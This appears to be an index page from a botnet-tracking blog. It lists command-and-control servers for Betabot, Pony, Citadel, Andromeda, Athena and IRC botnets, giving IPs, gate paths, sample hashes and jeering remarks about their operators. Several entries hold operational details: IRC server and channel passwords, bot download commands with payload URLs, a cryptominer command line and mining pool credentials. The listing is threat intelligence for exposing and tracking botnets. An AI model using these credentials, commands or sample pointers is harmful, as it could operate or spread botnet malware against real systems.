Server: 158.255.2.59 Port: 6667 Current local users 436, max 2038 Channel: #network #network 411 Related md5s (search on malwr.com to download the samples): 891905810486c6dee6d246f9845fb5cd Hosting infos: http://whois.domaintools.com/158.255.2.59
srv1.su (Betabot http botnet hosted by softronics.ch)
Resolved srv1.su to 94.242.198.65 Server: srv1.su Gate file: /b/order.php Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using a http bot. Unfortunately for him he chose to use the l33t Hackforums bot Betabot with a 1mb stub Autoit crypter, but I guess he can only manage toRead more...
92.243.77.139 (Pony loader hosted by infobox.ru)
Server: 92.243.77.139 Gate file: /Panel/gate.php Related md5s (search on malwr.com to download the samples): 160419b4c5f8415b41fb23e99be12b19 Hosting infos: http://whois.domaintools.com/92.243.77.139
y.osej36.com (Irc botnet hosted by gandi.net)
Resolved y.osej36.com to 92.243.8.222 Server: y.osej36.com Port: 80 Server password: passwd Channel: #root Channel password: redem !NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e !NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e !s -n A modified ircd is used, so you may have trouble connecting. Alternate domains: y.v23sdy.com y.rwt234.com Bitcoin mining info: minerd.exe -a scrypt -s 20 –no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -xRead more...
sisisu.su (Citadel banking malware hosted by he.net)
Resolved sisisu.su to 64.62.210.103 Server: sisisu.su Config file: /wheelbarrow/file.php Gate file: /wheelbarrow/prism.php Currently being downloaded by this betabot. This is his second attempt at a citadel net, the first one can be found here. Hosting infos: http://whois.domaintools.com/64.62.210.103 Related md5s (search on malwr.com to download the samples): Citadel: 5707e28e79f6b6d469874f8b87ecb3b9 Edit: The moron forgot to remove theRead more...
localmw.org (Andromeda http botnet hosted by ovh.net)
Resolved localmw.org to 198.50.158.222 Server: localmw.org Gate file: /gate.php Hosting infos: http://whois.domaintools.com/198.50.158.222 Related md5s (search on malwr.com to download the samples): e5ded5eca6ff72dbf2d5f39f0b801181
insane.pirate-the.net (Athena http botnet hosted by free-h.org)
Resolved insane.pirate-the.net to 91.234.104.150 Server: insane.pirate-the.net Gate file: /here/gate.php Thanks to whoever uploaded this on malwr Hosting infos: http://whois.domaintools.com/91.234.104.150 Related md5s (search on malwr.com to download the samples): Athena http: e0046f2d10c7c790cf07d258cdafe299
skyline2050.net (Andromeda http botnet hosted by infiumhost.com)
Resolved skyline2050.net to 188.190.127.160 Server: skyline2050.net Gate file: /761994/gate.php This is andromeda 2.07, not the cracked 2.06. You can tell by the admin page located at /adm.php, not on the index page. The owner of this betabot is updating with this, abandoning the betabot. Mining infos: dum:dum@s5.6d6f6e65797072696e746572.com:3333 Hosting infos: http://whois.domaintools.com/188.190.127.160 Related md5s (search on malwr.comRead more...
64.85.233.8 (Citadel banking malware hosted by home ip?)
Server: 64.85.233.8 Config file: /hide/1355/file.php Gate file: /hide/1355/enter.php According to whois, this is a home cable internet ip (United States Concord Astound Broadband). Also on the server, smoke loader and pony Smoke Server: 64.85.233.8 Gate file: /smokeldr/index.php Pony Server: 64.85.233.8 Gate file: /js/gate.php The moron running this has Pony downloading itself, creating a continuousRead more...
synd1cat3.com (Athena http botnet hosted by hostlatte.com)
Resolved synd1cat3.com to 192.95.33.40 Server: synd1cat3.com Gate file: /kJuN2p/gate.php Hosting infos: http://whois.domaintools.com/192.95.33.40 Related md5s (search on malwr.com to download the samples): Athena http: 88730b35c88269066e191695cf1e148d